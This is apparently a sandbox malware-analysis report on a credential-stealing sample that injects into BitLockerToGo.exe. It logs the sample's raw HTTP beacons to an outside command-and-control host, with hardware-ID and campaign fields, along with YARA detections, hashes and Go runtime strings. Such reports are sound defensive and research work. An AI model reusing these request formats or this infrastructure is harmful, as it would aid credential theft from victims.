                                                                                                                                                                                                          2025-01-07 05:02:02 UTC1184OUTData Raw: 2d 2d 49 57 41 39 4e 59 49 4e 46 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 49 57 41 39 4e 59 49 4e 46 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 57 41 39 4e 59 49 4e 46 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 49 57 41 39 4e 59 49 4e 46 44
                                                                                                                                                                                                          Data Ascii: --IWA9NYINFDTContent-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--IWA9NYINFDTContent-Disposition: form-data; name="pid"1--IWA9NYINFDTContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--IWA9NYINFD
                                                                                                                                                                                                          2025-01-07 05:02:02 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:02:02 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=khfoskp0fnq1luvf6108gqssjo; expires=Fri, 02 May 2025 22:48:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVha2KZFxYrwHAVyn8OLxodQCV%2BQlwrjM0KnCc6g%2BMVwHuJlVD5rC5KS6V2BB798jqrueOUVhxXHXEJM5ByLI6L2CntUUgBvbzd95rB7JtQG8q%2Flf2J5MhbHsMHA3i7CmQow"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe164aefa6443b3-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1597&rtt_var=617&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2094&delivery_rate=1746411&cwnd=203&unsent_bytes=0&cid=ec217eb52249d6ce&ts=745&x=0"
                                                                                                                                                                                                          2025-01-07 05:02:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                          2025-01-07 05:02:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          7192.168.2.1249721104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:02:03 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=31SWZHMOWET50R8LPR
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 1123
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:02:03 UTC1123OUTData Raw: 2d 2d 33 31 53 57 5a 48 4d 4f 57 45 54 35 30 52 38 4c 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 33 31 53 57 5a 48 4d 4f 57 45 54 35 30 52 38 4c 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 31 53 57 5a 48 4d 4f 57 45 54 35 30 52 38 4c 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37
                                                                                                                                                                                                          Data Ascii: --31SWZHMOWET50R8LPRContent-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--31SWZHMOWET50R8LPRContent-Disposition: form-data; name="pid"1--31SWZHMOWET50R8LPRContent-Disposition: form-data; name="lid"HpOoIh--2a727
                                                                                                                                                                                                          2025-01-07 05:02:04 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:02:04 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3pigodhnou5f3npue3kcougblq; expires=Fri, 02 May 2025 22:48:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZbRrcrG%2FpBnG0JW1olWriMogfmJ1E3QAjdflrjZSstzkGkiwUjGktfHmL0ZvOi7pe6I1qUCujkZYomK9HivT29VhomN3tS2E7PhfuHZZNohH0mI3Ie2xnC5HOyvVXkb1Qta"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe164b769c843b3-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1507&rtt_var=587&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2040&delivery_rate=1829573&cwnd=203&unsent_bytes=0&cid=96bf941c937000ce&ts=812&x=0"
                                                                                                                                                                                                          2025-01-07 05:02:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                          2025-01-07 05:02:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          8192.168.2.1249722104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:02:04 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 121
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:02:04 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=8A6CA42990BFD5D420A4C476FD51BCB1
                                                                                                                                                                                                          2025-01-07 05:02:05 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:02:05 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=p2ppsm8dvh3i7g0tjjfqtj7t0q; expires=Fri, 02 May 2025 22:48:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2BeFSGfXBh8hM8trcJxGDcx0xDO7ru9VdNKSheLsl944d0MNW0vk2Wf5SMEiWysgZbqv%2FerGB%2F1KhdhyY8ll1BE82i7PPlO9uMiSUI6edP3nNioPVdaAb9mJ7Qtnj9B3F4z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe164bfcbc0729f-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1950&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1022&delivery_rate=1466599&cwnd=169&unsent_bytes=0&cid=ddb54e68632c6dda&ts=501&x=0"
                                                                                                                                                                                                          2025-01-07 05:02:05 UTC54INData Raw: 33 30 0d 0a 6b 72 65 62 72 69 6b 46 4b 57 57 36 71 36 76 69 55 32 43 65 4d 32 2b 41 71 39 30 36 68 64 34 59 67 4d 44 64 69 5a 68 59 62 69 48 4a 36 67 3d 3d 0d 0a
                                                                                                                                                                                                          Data Ascii: 30krebrikFKWW6q6viU2CeM2+Aq906hd4YgMDdiZhYbiHJ6g==
                                                                                                                                                                                                          2025-01-07 05:02:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:00:01:13
                                                                                                                                                                                                          Start date:07/01/2025
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\NjFiIQNSid.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\NjFiIQNSid.exe"
                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                          File size:6'870'528 bytes
                                                                                                                                                                                                          MD5 hash:29CA15934B67B18A91254CE253A588CA
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                          Start time:00:01:47
                                                                                                                                                                                                          Start date:07/01/2025
                                                                                                                                                                                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                          Imagebase:0xef0000
                                                                                                                                                                                                          File size:231'736 bytes
                                                                                                                                                                                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00053820 Relevance: 11.4, Strings: 9, Instructions: 172COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filestoo much pixel dataunclosed left parenunexpected %s in %sunexpected g statusunknown Go ty, xrefs: 000539BB
                                                                                                                                                                                                            • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i, xrefs: 00053AAC
                                                                                                                                                                                                            • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscalldivision of zero by zero or infinity by infinityfail to read symbol table: %d aux symbols unreadgocron: .Every() int, xrefs: 00053AE0
                                                                                                                                                                                                            • bad g0 stackbad recoveryblacksquare;block clausecaller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifycontent-typecontext.TODOcurlyeqprec;curlyeqsucc;decode arraydecode slicediamondsuit;dumping heapempty numberend tracegcentersys, xrefs: 00053A2A
                                                                                                                                                                                                            • %, xrefs: 00053B44
                                                                                                                                                                                                            • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]too many Additionals to pack (>65535)t, xrefs: 00053B3B
                                                                                                                                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00053A51
                                                                                                                                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolbad wiretype for oneof field in %Tcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePo, xrefs: 00053A85
                                                                                                                                                                                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 00053B07
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.2737058535.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737030954.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737282306.000000000030A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737606122.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737653396.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737671116.0000000000625000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737703973.000000000066D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737735377.0000000000670000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737752947.0000000000671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737774414.0000000000674000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.0000000000688000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.0000000000693000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.0000000000697000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.00000000006B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.00000000006B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737921474.00000000006BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737965426.00000000006BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_20000_NjFiIQNSid.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscalldivision of zero by zero or infinity by infinityfail to read symbol table: %d aux symbols unreadgocron: .Every() int$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad wiretype for oneof field in %Tcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePo$bad g0 stackbad recoveryblacksquare;block clausecaller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifycontent-typecontext.TODOcurlyeqprec;curlyeqsucc;decode arraydecode slicediamondsuit;dumping heapempty numberend tracegcentersys$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]too many Additionals to pack (>65535)t$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filestoo much pixel dataunclosed left parenunexpected %s in %sunexpected g statusunknown Go ty
                                                                                                                                                                                                            • API String ID: 0-3319130270
                                                                                                                                                                                                            • Opcode ID: 5cb4ee51b62170627ef8323f801cc99301bc69fa46c8e4fd106c51184d7477e4
                                                                                                                                                                                                            • Instruction ID: 34139e041196a0559ce4402f391ca29fc8292428bd0adc3a7ad8051e538691f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cb4ee51b62170627ef8323f801cc99301bc69fa46c8e4fd106c51184d7477e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA81CDB45087418FD300EF68D199B9BBBE4BF88705F40892DF88897392EB759949CF52
                                                                                                                                                                                                            Function 00063870 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bernoullis;BoundIm, xrefs: 00063977
                                                                                                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoo many, xrefs: 000639C1
                                                                                                                                                                                                            • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinespreadMethodspreadmethodstdDeviationstddeviationstraightphi;succcurlyeq;succnapprox;sun_eu_greeksurfaceScalesurfacescalesweepWaitersthickapprox;traceStringstransmitfileunexpect, xrefs: 00063909
                                                                                                                                                                                                            • m->p= max= min= next= p->m= prev= span=% util%s: %s%v: %s' for '"&<>, xrefs: 0006392B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.2737058535.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737030954.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737282306.000000000030A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737606122.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737653396.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737671116.0000000000625000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737703973.000000000066D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737735377.0000000000670000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737752947.0000000000671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737774414.0000000000674000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.0000000000688000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.0000000000693000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.0000000000697000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.00000000006B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737793772.00000000006B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737921474.00000000006BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.2737965426.00000000006BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_20000_NjFiIQNSid.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: m->p= max= min= next= p->m= prev= span=% util%s: %s%v: %s' for '"&<>$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bernoullis;BoundIm$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoo many$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinespreadMethodspreadmethodstdDeviationstddeviationstraightphi;succcurlyeq;succnapprox;sun_eu_greeksurfaceScalesurfacescalesweepWaitersthickapprox;traceStringstransmitfileunexpect
                                                                                                                                                                                                            • API String ID: 0-3964228344
                                                                                                                                                                                                            • Opcode ID: c7dbbb62ea2f0c098609bf4d655ab6778abdd941d18e610cdd603f2223d883e4
                                                                                                                                                                                                            • Instruction ID: 08f2680d73bc516393e8d2f3680327944528d772d2008efb5b413d524744e158
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7dbbb62ea2f0c098609bf4d655ab6778abdd941d18e610cdd603f2223d883e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B31F1B45087408FD300EF24C185B9ABBF5FF88304F05886DE8889B752DB759948DFA2

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:8.9%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:73.2%
                                                                                                                                                                                                            Total number of Nodes:369
                                                                                                                                                                                                            Total number of Limit Nodes:30
